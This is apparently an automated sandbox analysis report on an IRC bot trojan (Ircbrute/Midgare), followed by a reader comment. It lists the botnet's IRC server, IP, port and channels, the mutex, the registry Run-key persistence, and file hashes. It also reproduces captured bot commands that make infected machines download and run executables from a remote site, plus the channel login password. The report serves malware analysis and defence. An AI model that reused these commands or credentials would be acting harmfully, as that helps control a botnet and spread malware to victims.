Remote Host      Port Number
irc.nurcan.net   8067
89.107.228.69    8067
Channel   Users   Modes
#.        4       [+mu]
#..       273     [+mu]
#opers    2       [+mu]
#msn      617     [+mMu]
#syn      290     [+mMu]
#baba     126     [+mu]
.r.getfile http://www.pcdebenyokken.net/porno2.exe C:/windowUpdate.exe 1
.indir www.pcdebenyokken.net/porno.exe 1
.login baban
.indir
bots at #baba login = ( .login baban )
at #msn = ( .l injecter )
.r.getfile http://www.pcdebenyokken.net/porno2.exe C:/windowUpdate.exe 1
NICK [00|USA|807464]
USER XP-7218 * 0 :COMPUTERNAME
Other details
* To mark the presence in the system, the following Mutex object was created:
o Gangsta
* The following ports were open in the system:
Port   Protocol   Process
1033   TCP        winudpmgr.EXE (%Windir%\winudpmgr.EXE)
1034   TCP        winudpmgr.EXE (%Windir%\winudpmgr.EXE)
* The following Host Name was requested from a host database:
o irc.nurcan.net
Registry Modifications
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Windows UDP Control Center = "winudpmgr.exe"
so that winudpmgr.exe runs every time Windows starts
Memory Modifications
* There were new processes created in the system:
Process Name                   Process Filename                          Main Module Size
winudpmgr.exe                  %Windir%\winudpmgr.exe                    315 392 bytes
[filename of the sample #1]    [file and pathname of the sample #1]      69 632 bytes
File System Modifications
* The following file was created in the system:
#   Filename(s)                              File Size       File Hash                                            Alias
1   [file and pathname of the sample #1]     90 644 bytes    MD5: 0x3A97DAAA59E1AA0B0D387A2C8B26C165               Trojan.Win32.Midgare.apkk [Kaspersky Lab]
    %Windir%\winudpmgr.exe                                   SHA-1: 0x45BB30ED6BB464634E43E94485E72446276E91F1    Generic.dx!tgh [McAfee]
                                                                                                                  Trojan:Win32/Ircbrute [Microsoft]
                                                                                                                  Trojan.Win32.Ircbrute [Ikarus]
建邱勳 - August 6, 2010 at 2:06 pm
Thanks for sharing, this is of immeasurable merit.